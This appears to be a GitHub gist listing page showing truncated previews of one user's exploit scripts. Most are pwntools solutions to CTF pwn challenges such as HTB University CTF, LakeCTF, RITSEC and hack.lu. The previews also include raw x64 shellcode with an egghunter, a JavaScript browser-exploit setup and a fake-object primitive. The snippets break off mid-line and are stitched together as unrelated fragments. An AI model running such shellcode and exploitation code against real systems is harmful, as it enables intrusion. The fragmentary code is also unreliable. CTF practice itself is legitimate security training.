Skip to content

Instantly share code, notes, and snippets.

@YiChenChai
YiChenChai / expl.py
Created December 8, 2022 00:56
HTB University CTF 2022 Wizard's Diary exploit
from pwn import *
def login(info):
proc.sendlineafter('Name: ', 'guest')
proc.sendlineafter('account: ', info)
def new_note(sz, cnt):
proc.sendlineafter('> ', '1')
proc.sendlineafter('note: ', str(sz))
proc.sendafter('Note: ', cnt)
@YiChenChai
YiChenChai / expl1.py
Created November 8, 2022 19:48
LakeCTF 2022 paccheri solution
from pwn import *
# context.log_level = 'debug'
def add_pkg(dest):
proc.sendlineafter('too long', '1')
proc.sendlineafter('address:', dest)
def remove_pkg(idx):
proc.sendlineafter('too long', '2')
egghunter = "I\xbe\x08\x94\x1c\x80\x01\x00\x00\x00H\xc7\xc1\x00\x11\x00\x00A\xff\x96\xd8\x0c\x00\x00H\x05\x00\x0f\x00\x00H\x8d\xa8\x00\x01\x00\x00H\x89\xc4H\x83\xecPH\xb92\xbb=\x80\x01\x00\x00\x00A\xff\x16I\x89\xc5H\x89\xc1A\xffV0H\x89\xc6H1\xdbH\x01\xdeL\x89\xe9H\x8d\x15\x02\x00\x00\x00\xeb\rVirtualQuery\x00A\xff\x96\x88\x01\x00\x00H\x89\xf1H\x89\xeaI\xc7\xc0\x00\x01\x00\x00\xff\xd0\x8b]\x18H\x8bu\x00\x8bE \xa9\x00 \x01\x00u\xbd\x8bE(\xa9\x00\x00\x02\x00t\xb3\x8bE$\xa9\x01\x00\x00\x00u\xa9L\x8d\x0c\x1eH\x8b\x06H=\xef\xbe7\x13t\x0bH\x83\xc6\x08L9\xceu\xec\xeb\x8fI\x89\xf1H\x83\xc6\x08H\x89\xf1H\xc7\xc2\x00P\x00\x00I\xc7\xc0@\x00\x00\x00H\x8d\x1d'\xff\xff\xff\xffS\xf8\xff\xe6"
buf = ""
buf += "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41"
buf += "\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48"
buf += "\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f"
buf += "\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c"
buf += "\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52"
buf += "\x41\x51\x
import idaapi
import idautils
import idc
import ida_hexrays
def mod_sig(ea):
tinfo = idaapi.tinfo_t()
ida_typeinf.guess_tinfo(tinfo, ea)
funcdet = idaapi.func_type_data_t()
tinfo.get_func_details(funcdet)
from vulnmod import *
import paramiko
import logging
logging.basicConfig()
logging.getLogger("paramiko").setLevel(logging.DEBUG) # for example
ssh_client = VulnSSHClient()
ssh_client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh_client.connect(hostname='x.x.x.x',username='xxx',password='xxx')
(defn fakeobj [a b]
(def buffer (tarray/buffer 8))
(def buffer-float64-view (tarray/new :float64 1 1 0 buffer))
(def buffer-uint32-view (tarray/new :uint32 2 1 0 buffer))
(set (buffer-uint32-view 1) a)
(set (buffer-uint32-view 0) b)
(buffer-float64-view 0)
)
(defn funcarg [a] (a))
String.prototype.repeat=function(count){var str=''+this;count=+count;count=Math.floor(count);var maxCount=str.length*count;count=Math.floor(Math.log(count)/Math.log(2));while(count){str+=str;count--;}
str+=str.substring(0,maxCount-str.length);return str;}
zzzaa = [];
zzzcb1 = new DataView(141);
zzzcb2 = new Number(1337);
zzzcc1 = []; zzzcc2 = []; zzzcc3 = []; zzzcc4 = []; zzzcc5 = []; zzzcc6 = [];
var zzzbb1 = "A".repeat(65534);
var zzzbb2 = "\x11".repeat(64); //64
// 65535 + seplen _+ str1len
from pwn import *
proc = process('/tmp/pwn/onetimepad_debug', env={'LD_PRELOAD':'/tmp/out/lib/x86_64-linux-gnu/libc.so.6'})
# proc = remote('88.198.154.140', 31336)
def write(c):
proc.sendlineafter('> ', 'w')
proc.sendline(c)
def read(idx):
proc.sendlineafter('> ', 'r')
proc.sendline(str(idx))
return proc.recvuntil('\n')[:-1]
@YiChenChai
YiChenChai / wumb0list.py
Created November 21, 2019 09:45
Exploit for wumb0list RITSEC CTF 2019
from pwn import *
# context.log_level = 'debug'
proc = process('./wumb0list')
OFFSET = 0x809c0
FREE_HOOK = 0x3ed8e8
PIVOT = 0x40568
proc.sendlineafter('FAM', '2')
proc.sendlineafter('Back', '1')
proc.sendlineafter('Choose wisely: ', p64(0x603020) + p64(0x6030d8))
proc.sendlineafter('Back', '4')
@YiChenChai
YiChenChai / exploit.py
Created October 30, 2019 14:10
Exploit for hack.lu Contiki-NG challenge
from pwn import *
from slip import slip
# flag: flag{IoT_operating_system_down_wooo}
serv = server(60001)
proc = serv.next_connection()
sobj = slip()
e = sobj.encode
proc.send(e('!M' + '\x00' * 8))
first_frag = '\x01' * 2 # Useless header
sz = 0x100